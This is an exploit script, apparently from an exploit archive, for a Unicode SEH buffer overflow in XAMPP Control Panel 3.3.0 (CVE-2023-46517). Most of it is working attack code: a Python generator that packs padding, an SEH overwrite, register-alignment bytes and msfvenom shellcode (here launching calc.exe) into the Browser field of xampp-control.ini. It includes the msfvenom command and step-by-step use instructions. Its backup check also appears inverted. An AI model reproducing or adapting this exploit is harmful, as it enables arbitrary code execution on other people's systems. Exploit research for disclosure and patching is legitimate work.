# Exploit Title: XAMPP v3.3.0 — '.ini' Buffer Overflow (Unicode + SEH)
# Date: 2023-10-26
# Author: Talson (@Ripp3rdoc)
# Software Link: https://sourceforge.net/projects/xampp/files/XAMPP%20Windows/8.0.28/xampp-windows-x64-8.0.28-0-VS16-installer.exe
# Version: 3.3.0
# Tested on: Windows 11
# CVE-2023-46517
##########################################################
# _________ _______ _ _______ _______ _ #
# \__ __/( ___ )( \ ( ____ \( ___ )( ( /| #
# ) ( | ( ) || ( | ( \/| ( ) || \ ( | #
# | | | (___) || | | (_____ | | | || \ | | #
# | | | ___ || | (_____ )| | | || (\ \) | #
# | | | ( ) || | ) || | | || | \ | #
# | | | ) ( || (____/\/\____) || (___) || ) \ | #
# )_( |/ \|(_______/\_______)(_______)|/ )_) #
# #
##########################################################
# Proof of Concept:
# 1.- Run the python script "poc.py", it will create a new file "xampp-control.ini"
# 2.- Open the application (xampp-control.exe)
# 3.- Click on the "admin" button in front of Apache service.
# 4.- Profit
# Proof-of-Concept code on GitHub: https://github.com/ripp3rdoc/XAMPPv3.3.0-BOF/
# Greetingz to EMU TEAM (¬‿¬)⩙
from pwn import *
import shutil
import os.path
buffer = "\x41" * 268 # 268 bytes to fill the buffer
nseh = "\x59\x71" # next SEH address — 0x00590071 (a harmless padding)
seh = "\x15\x43" # SEH handler — 0x00430015: pop ecx ; pop ebp ; ret ;
padd = "\x71" * 0x55 # padding
eax_align = "\x47" # venetian pad/align
eax_align += "\x51" # push ecx
eax_align += "\x71" # venetian pad/align
eax_align += "\x58" # pop eax -> eax = 0019e1a0
eax_align += "\x71" # venetian pad/align
eax_align += "\x05\x24\x11" # add eax,0x11002300
eax_align += "\x71" # venetian pad/align
eax_align += "\x2d\x11\x11" # sub eax,0x11001100 -> eax = 0019F3DC
eax_align += "\x71" # venetian pad/align
eax_align += "\x50" # push eax
eax_align += "\x71" # pad to align the following ret
eax_align += "\xc3"; # ret into eax?
# msfvenom -p windows/exec CMD=calc.exe -e x86/unicode_mixed -f raw EXITFUNC=thread BufferRegister=EAX -o shellcode.bin
# Payload size: 512 bytes
shellcode = (
"PPYAIAIAIAIAIAIAIAIAIAIAIAIAIAIAjXAQADAZABARALAYAIAQAIAQAIAhAAAZ1AIAIAJ11AIAIABABABQI1"
"AIQIAIQI111AIAJQYAZBABABABABkMAGB9u4JBkLzHrbM0ipm0c0bi7u01Ep1TBkb0nPdKR2zlrknrKdDK42Kx"
"Jo6WpJnFLqiofLMl1QallBLlO0gQxOzmjagW7rZRObpWBkNrZpdKMzmlBkNlzq1hZC0HKQwab1dKQIKp9qiCrk"
"myKhGslzoYtKMdTKkQJ6ma9odlgQ8OJmM1vg08iPD5yfjcSMjXOKQmnDRUhdaH4KR8mTIq7c2FDKjlpKrkaHML"
"JaZ3dKItrkYqhPU9MtO4KtOk1KC1QI1JNqKO9P1OOoqJtKn2HkRmOmaZjatMbe7BYpm0kPR0PhmadKRODGioj57"
"KgpmMnJZjoxDfceemCmYo9EmlivcL9zE0ikWpQe9ugKoWKcprpo2Jip23KOHUQSaQ0l33Lns5PxrEKPAA"
)
shellcode = buffer + nseh + seh + eax_align + padd + shellcode
check_file = os.path.isfile("c:\\xampp\\xampp-control.ini")
if check_file:
print("[!] Backup file found. Generating the POC file...")
pass
else:
# create backup
try:
shutil.copyfile("c:\\xampp\\xampp-control.ini", "c:\\xampp\\xampp-control.ini.bak")
print("[+] Creating backup for xampp-control.ini...")
print("[+] Backup file created!")
except Exception as e:
print("[!] Failed creating a backup for xampp-control.ini: ", e)
try:
# Create the new file
with open("c:\\xampp\\xampp-control.ini", "w", encoding='utf-8') as file:
file.write(f"""[Common]
Edition=
Editor=
Browser={shellcode}
Debug=0
Debuglevel=0
Language=en
TomcatVisible=1
Minimized=0
[LogSettings]
Font=Arial
FontSize=10
[WindowSettings]
Left=-1
Top=-1
Width=682
Height=441
[Autostart]
Apache=0
MySQL=0
FileZilla=0
Mercury=0
Tomcat=0
[Checks]
CheckRuntimes=1
CheckDefaultPorts=1
[ModuleNames]
Apache=Apache
MySQL=MySQL
Mercury=Mercury
Tomcat=Tomcat
[EnableModules]
Apache=1
MySQL=1
FileZilla=1
Mercury=1
Tomcat=1
[EnableServices]
Apache=1
MySQL=1
FileZilla=1
Tomcat=1
[BinaryNames]
Apache=httpd.exe
MySQL=mysqld.exe
FileZilla=filezillaserver.exe
FileZillaAdmin=filezilla server interface.exe
Mercury=mercury.exe
Tomcat=tomcat8.exe
[ServiceNames]
Apache=Apache2.4
MySQL=mysql
FileZilla=FileZillaServer
Tomcat=Tomcat
[ServicePorts]
Apache=80
ApacheSSL=443
MySQL=3306
FileZilla=21
FileZill=14147
Mercury1=25
Mercury2=79
Mercury3=105
Mercury4=106
Mercury5=110
Mercury6=143
Mercury7=2224
TomcatHTTP=8080
TomcatAJP=8009
Tomcat=8005
[UserConfigs]
Apache=
MySQL=
FileZilla=
Mercury=
Tomcat=
[UserLogs]
Apache=
MySQL=
FileZilla=
Mercury=
Tomcat=
""")
print("[+] Created the POC!")
except Exception as e:
print("[!] Failed creating the POC xampp-control.ini: ", e)